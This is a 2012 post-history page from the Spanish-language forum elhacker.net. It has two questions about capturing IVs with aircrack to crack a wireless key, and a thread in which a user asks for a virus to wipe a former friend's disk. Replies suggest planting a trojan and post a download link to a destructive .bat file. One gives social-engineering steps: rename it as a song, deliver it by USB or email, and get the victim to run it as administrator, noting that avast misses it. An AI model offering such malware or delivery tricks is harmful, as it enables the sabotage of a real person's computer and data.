elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Wireless en Windows / Ayuda con ivs en aircrack en: 4 Mayo 2012, 02:59 am
tengo un problema, cuando uso el aircrack me dice:


[00:00:00] Tested 0 keys <got 1 IVs>


 no se como solucionarlo :S
2  Seguridad Informática / Wireless en Windows / Ayuda con ivs en aircrack en: 4 Mayo 2012, 02:21 am
Hola, tengo una duda, o problema, pude hacer full en commview y deje toda la noche enviando datos, llege a 2.850.015 y lo guarde, los hice todo, y lo abri con el aircrack, y nomas llege a 265 ivs :s como llego a los 5000 ??
3  Seguridad Informática / Hacking / Re: Ayuda con virus en: 4 Mayo 2012, 02:13 am
gracias a todos. son todos grosos!!
Los hackers, unidos, jamas serán vencidos
4  Seguridad Informática / Hacking / Re: Ayuda con virus en: 1 Mayo 2012, 17:09 pm
No se si deberia comentarlo (mas que nada por las reglas del foro y demas), pero existe un programa para crear virus; no se si te puede servir, pero que vamos, almenos es algo.
Por cierto, busca por goolge "programa para crear virus" (sin las comillas, claro esta), a ver si te puede servir.
Espero haberte sido de ayuda, y me disculpo por marearte tanto.
Saludos.

no ahi problema. muchas gracias
5  Seguridad Informática / Hacking / Re: Ayuda con virus en: 1 Mayo 2012, 16:54 pm
Pues podria intentarlo pero eso es mas dificil... aparte de eso si que lo detectarian los antivirus...

pasa q ese bat le jode en el momento, si reinicias se arregla XD, porfa lo nesesito, no sabe nada el chavon de pcs, asi q es facil engañarlo, porfavor!!!
6  Seguridad Informática / Hacking / Re: Ayuda con virus en: 1 Mayo 2012, 16:31 pm
Te rebienta explorer.exe el corazon de windows por decirlo asi que yo sepa avast todavía no lo detecta  :¬¬

no tenes algo para joderle archivois de inicio de windows asi tiene que fomatiar??
7  Seguridad Informática / Hacking / Re: Ayuda con virus en: 30 Abril 2012, 21:07 pm
No deberia hacer esto pero sere un buen compañero. Con conocimientos de informatica minimos: Descarga esto: http://jop.orgfree.com/asd.zip Lo descomprimes. Le pones el nombre que quieras yo le puse Cancion se lo passas por pendrive, correo etc Atencion!: La parte mas importante: Le dices que haga boton derecho y ejecutar como administrador. Le petara la maquina entera al instante. No estes cerca cuando eso ocurra.


Una consulta, ese bat que hace? muchas gracias
8  Seguridad Informática / Hacking / Re: Ayuda con virus en: 29 Abril 2012, 20:25 pm
No creo que quieras ponerte a aprender para lograr eso, asi que estas en el lugar equivocado, ve a la policia y que hagan todos ellos. Si es verdad que la quiso violar..

ahi un problema con ello, es mi pais la justicia apesta y despues somos menores de edad por ende, menos todavia :S
9  Seguridad Informática / Hacking / Re: Ayuda con virus en: 29 Abril 2012, 20:22 pm
Y digo yo, ¿no seria mejor colarle algun troyano u algo asi y meterte en su ordenador para asi borrarle las fotos?; lo digo mas que nada porque, segun tengo entendido, no es posible hacer lo que pides, que yo sepa, y no es por dar "malas ideas" ni nada, pero dada la situacion, pues no se.
Saludos.

muchas gracias, me puedes facilitar algun troyano? y mas o menos si tiene alguna configuracion rara me tiras una mano
10  Seguridad Informática / Hacking / Ayuda con virus en: 29 Abril 2012, 20:13 pm
Hola gente, alguien sabe donde puedo encontrar un virus que pueda quemar el disco rigido o formatiar todo el disco y todas las particiones, porque un ex amigo, hizo algo malo, muy, aparte de querer violar a la ex hablo mal a nuestras espaldas, y en esa pc tiene fotos de la ex que no pueden salir a la luz, nesesito borrar esas fotos, y no podemos acceder fisicamente a ella, nesesito algo, muchas gracias, o si saben algo que pueda hacer...
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines